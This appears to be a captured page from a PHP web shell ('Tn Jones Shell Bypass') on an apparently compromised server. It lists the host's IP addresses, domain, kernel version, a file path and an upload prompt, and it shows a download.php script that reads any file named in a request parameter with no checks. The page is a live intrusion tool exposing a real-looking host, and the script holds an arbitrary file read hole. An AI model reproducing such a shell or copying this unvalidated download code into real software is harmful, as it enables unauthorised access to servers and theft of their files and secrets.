Tn Jones Shell Bypass
:
18.119.213.78
:
160.187.54.56 / upgov.net
:
Linux 160-187-54-56.cprapid.com 4.18.0-553.22.1.lve.1.el7h.x86_64 #1 SMP Tue Oct 8 14:36:03 UTC 2024 x86_64
:
/
home
/
upgov
/
www
/
rmpyrll
/
Upload File:
files >> /home/upgov/www/rmpyrll/download.php
<?php if ($_REQUEST ['getfile']){ $file = $_REQUEST ['getfile']; } $save_as_name = basename($file); ini_set('session.cache_limiter', ''); header('Expires: Thu, 19 Nov 1981 08:52:00 GMT'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: no-cache'); header("Content-Type: application/octet-stream"); header("Content-Disposition: disposition-type=attachment; filename=\"$save_as_name\""); readfile($file); ?>